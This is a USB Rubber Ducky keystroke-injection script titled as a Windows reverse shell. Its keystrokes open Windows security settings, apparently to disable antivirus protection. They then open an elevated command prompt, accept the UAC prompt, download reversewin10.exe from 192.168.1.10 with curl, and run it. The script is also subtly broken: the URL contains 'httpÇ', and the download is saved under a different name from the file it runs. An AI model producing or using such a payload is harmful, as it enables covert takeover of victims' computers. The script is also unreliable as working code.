REM Reverse Shell de Windows
DELAY 10000
GUI
STRING virus 
DELAY 500
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 2000
ENTER
DELAY 5000
SPACE
DELAY 2000
LEFT
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
SPACE
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 500
SPACE
DELAY 1000
ALT F4
DELAY 10000
GUI R
DELAY 500
STRING powershell Start-Process cmd.exe -Verb RunAs
ENTER
DELAY 5000
LEFT
DELAY 500
ENTER
DELAY 2000
ENTER
DELAY 500
STRING curl httpÇ://192.168.1.10/reversewin10.exe -o rever
ENTER
DELAY 2000
STRING reversewin10.exe
ENTER
DELAY 2000
ALT F4
